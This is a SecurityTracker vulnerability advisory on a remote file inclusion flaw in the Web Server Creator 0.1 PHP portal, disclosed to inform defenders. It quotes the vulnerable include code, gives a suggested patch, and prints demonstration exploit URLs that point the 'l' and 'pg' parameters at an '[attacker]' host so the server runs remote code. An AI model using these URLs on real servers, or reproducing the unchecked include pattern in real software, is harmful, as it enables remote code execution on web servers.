SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Web Server Creator Vendors:   Sphinx, Djidane
Web Server Creator Include File Error Enables Remote Users to Execute Arbitrary Commands
SecurityTracker Alert ID:  1005712
SecurityTracker URL:  http://securitytracker.com/id/1005712
CVE Reference:   CVE-2002-2217   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Nov 26 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.1
Description:   A vulnerability was reported in the Web Server Creator PHP scripts. A remote user can execute arbitrary commands on the target server.

It is reported that the 'news/include/customize.php' script and the 'index.php' script both reference include files without specifying the file locations. A remote user can create a specially crafted URL that specifies a remote location for the include file so that the web server will execute code in the remotely located file.

Some demonstration exploit URLs are provided:

http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with
http://[attacker]/file.txt

http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php

Impact:   A remote user can execute arbitrary commands on the target server with the privileges of the web server process.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following instructions for fixing the flaw:

- Delete bugged lines in news/include/customize.php
- In index.php replce this line :
require ("$pg.php");
by :
-------------------
if (file_exists($pg.".php")){
require ("$pg.php");
}
-------------------

Vendor URL:  webcreator.com02.com (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  Web Server Creator - Web Portal 0.1 (PHP)







Informations :
Website : http://webcreator.com02.com
Tested version : 0.1
Problem : Include file

PHP Code/Location :
news/include/customize.php :
------------------
<?
$langfile = $l;

include $l;
?>
------------------

index.php :
-----------------------------------
[...]
if (!$pg) { $pg = "acceuil"; }
[...]
require ("$pg.php");
?>
[...]
-----------------------------------

Exploits :
http://[target]/news/include/customize.php?l=http://[attacker]/file.txt
with
http://[attacker]/file.txt

and

http://[target]/index.php?pg=http://[attacker]/badfile
with
http://[attacker]/badfile.php



Solution :
- Delete bugged lines in news/include/customize.php
- In index.php replce this line :
require ("$pg.php");
by :
-------------------
if (file_exists($pg.".php")){
require ("$pg.php");
}
-------------------

A patch can be found on http://www.phpsecure.org.


More details :
In french :
http://www.frog-man.org/tutos/WSC-WebPortal.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FWSC-WebPortal.txt&langpair=fr%7Cen&hl=fr&ie=ASCII&oe=ASCII



frog-m@n



_________________________________________________________________
MSN Search, le moteur de recherche qui pense comme vous ! 
http://search.msn.fr/worldwide.asp


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC